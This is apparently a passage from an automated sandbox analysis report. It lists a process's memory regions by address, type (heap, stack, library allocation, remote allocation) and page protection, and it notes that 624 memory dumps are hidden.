18407AB9000
heap
page read and write
18407BE7000
heap
page read and write
1840742A000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1FF750C1000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1840C7A0000
trusted library allocation
page read and write
1FF7510B000
heap
page read and write
18407981000
trusted library allocation
page read and write
18407E7C000
trusted library allocation
page read and write
184078A8000
heap
page read and write
18407AC3000
heap
page read and write
A480979000
stack
page read and write
18407B38000
heap
page read and write
77A0E7E000
stack
page read and write
184073BD000
trusted library allocation
page read and write
184078B0000
heap
page read and write
22610001000
trusted library allocation
page read and write
184078D1000
heap
page read and write
2266D360000
heap
page read and write
A480BFE000
stack
page read and write
17C06F40000
heap
page read and write
18407B2C000
heap
page read and write
18407A73000
heap
page read and write
18407BE7000
heap
page read and write
1FF74EB0000
trusted library allocation
page read and write
22601991000
trusted library allocation
page read and write
1FF74F7C000
trusted library allocation
page read and write
1FF70202000
heap
page read and write
1FF74E8E000
trusted library allocation
page read and write
1FF6FA0B000
heap
page read and write
184078B6000
heap
page read and write
6F558F3000
stack
page read and write
1FF708A0000
trusted library section
page readonly
77A177E000
stack
page read and write
184078A7000
heap
page read and write
1FF74ECD000
trusted library allocation
page read and write
17C054E0000
trusted library allocation
page read and write
2266AE47000
heap
page read and write
18407E84000
trusted library allocation
page read and write
1FF70740000
trusted library allocation
page read and write
77A0FFE000
unkown
page readonly
18407AA5000
heap
page read and write
1FF708F0000
trusted library section
page readonly
77A18FE000
unkown
page readonly
18407A89000
heap
page read and write
18407839000
heap
page read and write
17C06E00000
heap
page read and write
7DF4E5230000
trusted library allocation
page execute and read and write
1FF6F9A0000
heap
page read and write
17C0551E000
heap
page read and write
1FF70E00000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
18407449000
trusted library allocation
page read and write
1FF75060000
heap
page read and write
2266C953000
trusted library allocation
page read and write
1FF74EC4000
trusted library allocation
page read and write
1FF6FAB5000
heap
page read and write
1FF6FAA1000
heap
page read and write
18407CF0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
18407AD0000
heap
page read and write
184077BA000
heap
page read and write
17C06E4F000
heap
page read and write
184079DE000
trusted library allocation
page read and write
18407BEE000
heap
page read and write
1840C212000
trusted library allocation
page read and write
184073A6000
trusted library allocation
page read and write
184078E9000
heap
page read and write
2266AE84000
heap
page read and write
18407E8C000
trusted library allocation
page read and write
184078B5000
heap
page read and write
18407BF6000
trusted library allocation
page read and write
18407E50000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
22610074000
trusted library allocation
page read and write
18407E5C000
trusted library allocation
page read and write
2266C830000
heap
page read and write
18407A89000
heap
page read and write
1FF750C9000
heap
page read and write
779FE7B000
stack
page read and write
18407932000
trusted library allocation
page read and write
1FF6FB28000
heap
page read and write
1FF74FD0000
trusted library allocation
page read and write
A4805FE000
stack
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
1FF74EF2000
trusted library allocation
page read and write
184078AE000
heap
page read and write
184077B1000
heap
page read and write
2266AE65000
heap
page read and write
1FF6FA2B000
heap
page read and write
1FF6FA91000
heap
page read and write
1FF6FA13000
heap
page read and write
77A0AFE000
unkown
page readonly
7FFD9B880000
trusted library allocation
page execute and read and write
1FF75220000
remote allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
18407A2A000
heap
page read and write
18407B53000
heap
page read and write
A480C7C000
stack
page read and write
77A09FC000
stack
page read and write
1DE6B6F0000
heap
page read and write
1FF74F7F000
trusted library allocation
page read and write
1FF74F0E000
trusted library allocation
page read and write
1FF74FD0000
trusted library allocation
page read and write
184077F0000
heap
page read and write
1840C7B0000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1FF701F0000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
1840C80E000
heap
page read and write
A480473000
stack
page read and write
18407E80000
trusted library allocation
page read and write
1FF74F50000
trusted library allocation
page read and write
18407BF0000
trusted library allocation
page read and write
18407ACE000
heap
page read and write
1840C7C0000
trusted library allocation
page read and write
18407874000
heap
page read and write
1FF74E80000
trusted library allocation
page read and write
17C06E24000
heap
page read and write
2266AF12000
heap
page read and write
6F55FFE000
stack
page read and write
18407E98000
trusted library allocation
page read and write
18407BEB000
heap
page read and write
17C055C4000
heap
page read and write
184078B5000
heap
page read and write
18407921000
trusted library allocation
page read and write
184078E1000
heap
page read and write
1FF74E95000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
18407A6D000
heap
page read and write
22601C6B000
trusted library allocation
page read and write
18407871000
heap
page read and write
184077F0000
heap
page read and write
18407B53000
heap
page read and write
1FF6F9D0000
trusted library allocation
page read and write
22610080000
trusted library allocation
page read and write
18407B2C000
heap
page read and write
18407B77000
heap
page read and write
1FF74F68000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
944A07B000
stack
page read and write
18407820000
heap
page read and write
1FF701C1000
trusted library allocation
page read and write
184077ED000
heap
page read and write
1FF6FA5C000
heap
page read and write
184073D7000
trusted library allocation
page read and write
1FF6FA6F000
heap
page read and write
6F5674B000
stack
page read and write
77A157E000
stack
page read and write
18407710000
remote allocation
page read and write
2266D162000
heap
page read and write
2266D13C000
heap
page read and write
77A16F9000
stack
page read and write
18407400000
trusted library allocation
page read and write
2266CC79000
heap
page read and write
17C06E18000
heap
page read and write
1840C80D000
heap
page read and write
1FF74EEC000
trusted library allocation
page read and write
A480A7F000
stack
page read and write
184077EB000
heap
page read and write
184078B6000
heap
page read and write
18407B4C000
heap
page read and write
2266B020000
heap
page read and write
18407ACA000
heap
page read and write
2266AE8A000
heap
page read and write
22600001000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
1FF708E0000
trusted library section
page readonly
A4809F7000
stack
page read and write
A48067C000
stack
page read and write
1FF6FA6C000
heap
page read and write
18407358000
trusted library allocation
page read and write
18407BEB000
heap
page read and write
18407BEE000
heap
page read and write
1DE6B500000
heap
page read and write
2266AE88000
heap
page read and write
17C05370000
heap
page read and write
184078CD000
heap
page read and write
18407B4C000
heap
page read and write
18408760000
trusted library allocation
page execute
18407A6D000
heap
page read and write
184073FB000
trusted library allocation
page read and write
77A08FE000
unkown
page readonly
184078B6000
heap
page read and write
77A04FE000
unkown
page readonly
18407AC3000
heap
page read and write
1FF70401000
trusted library allocation
page read and write
77A117E000
stack
page read and write
184073CE000
trusted library allocation
page read and write
18407710000
remote allocation
page read and write
1FF74FC0000
trusted library allocation
page read and write
A480878000
stack
page read and write
1FF74EEF000
trusted library allocation
page read and write
1840C7A0000
trusted library allocation
page read and write
1FF7502C000
heap
page read and write
1FF70200000
heap
page read and write
1840C7B2000
heap
page read and write
1840788B000
heap
page read and write
1FF75102000
heap
page read and write
1FF74FE0000
trusted library allocation
page read and write
18407851000
heap
page read and write
184077BA000
heap
page read and write
1FF74ED6000
trusted library allocation
page read and write
184077BF000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
18407789000
heap
page read and write
18407B75000
heap
page read and write
1FF6F8C0000
heap
page read and write
2266CC0D000
heap
page read and write
18407743000
heap
page read and write
18407BE7000
heap
page read and write
1840799B000
trusted library allocation
page read and write
18407A00000
heap
page read and write
226101B7000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
22601863000
trusted library allocation
page read and write
18407A4A000
heap
page read and write
1840C710000
trusted library allocation
page read and write
17C055E8000
heap
page read and write
1840776B000
heap
page read and write
2266AE40000
heap
page read and write
22601D30000
trusted library allocation
page read and write
2266AE8C000
heap
page read and write
1FF70302000
heap
page read and write
184078C7000
heap
page read and write
1FF750EF000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
1DE6B6F5000
heap
page read and write
2266CC42000
heap
page read and write
18407411000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
1840782A000
heap
page read and write
A48164E000
stack
page read and write
1FF74F23000
trusted library allocation
page read and write
77A22FE000
unkown
page readonly
There are 624 hidden memdumps, click here to show them.